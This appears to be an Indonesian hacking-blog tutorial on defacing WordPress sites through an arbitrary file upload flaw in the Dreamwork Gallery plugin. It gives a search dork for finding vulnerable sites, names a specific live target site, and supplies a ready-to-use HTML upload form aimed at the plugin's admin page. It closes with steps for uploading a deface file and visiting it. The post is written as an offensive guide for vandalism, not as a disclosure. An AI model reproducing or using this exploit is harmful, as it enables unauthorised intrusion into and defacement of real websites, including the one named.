Deface Methode Arbitrary Dreamwork Galery Uploader + Live Target


Assallamualaikum Wr.Wb Nahh Kan Ketemu Lagi Sama Gw :v
Kali Ini Gw Akan Memberikan Tutorial Deface Methode Arbitrary Dreamwork Galery Uploader + Live Target
Oke Siapin Bahan bahannya

Bahan-bahan:
-Dork: inurl:/wp-content/plugins/wp-dreamworkgallery
- Live Target :
  http://salonbluehair.com
- Csrf ?
<form action="http://Target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
- Note:
  Yang Gw Warnain Ganti Ama Target Lu
  Copy dan Save dengan ekstensi (.html)

Oke pertama ngedork dibrowser anda sekali lagi jan di puffin :v

Nah Pasti Ada Banyak Web... Pilih Salah Satu Aja Jan Semua... Gaenak Kalo Dibagi Bagi :v...

Vuln? Ada Code Xml Kayak Gambar Dibawah


Nah Udah Nemu Web Vuln Kan? Sekarang Masukkin Webnya Ke csrf Yang Tadi... Inget ganti cuman yang warna merah

Kalo Udah Diganti Jangan Lupa Disimpen eaa :v Nah Kalo Udah Buka File Yang Udah Disimpen Tadi Lewat Browser Anda Seperti Gambar Dibawah


Kalo Udah Dipilih File Tinggal Crotz Eh Maksud Gw Tinggal Submit :v Nah Kalo Udah Diupload Filenya Cara Udah Ke Deface Apa Belom Masukkan Exploit Yang Gw Lingkarin Dibawah

Nahh Yang Gw Lingkarin Tuh Tambahin Dibelakang Web... Gak Paham? Misalnya
http://target.com
Nah Lu Tambahin dah Yang Gw Lingkarin Jadi Gini
http://target.com/bla/bla/bla
Yang Bla Bla Bla Tuh Ubah Yang Gw Lingkarin Digambar...
Mau Cek Hasil?



Oke Sampai Disini Aja Tutorial Deface Saya 

Wassalamualaikum Wr.Wb

INH In Here!!!

SynonKun

Kalo Udah Bisa Gaush Sombong Bang Muehehe

0 comments:

Post a Comment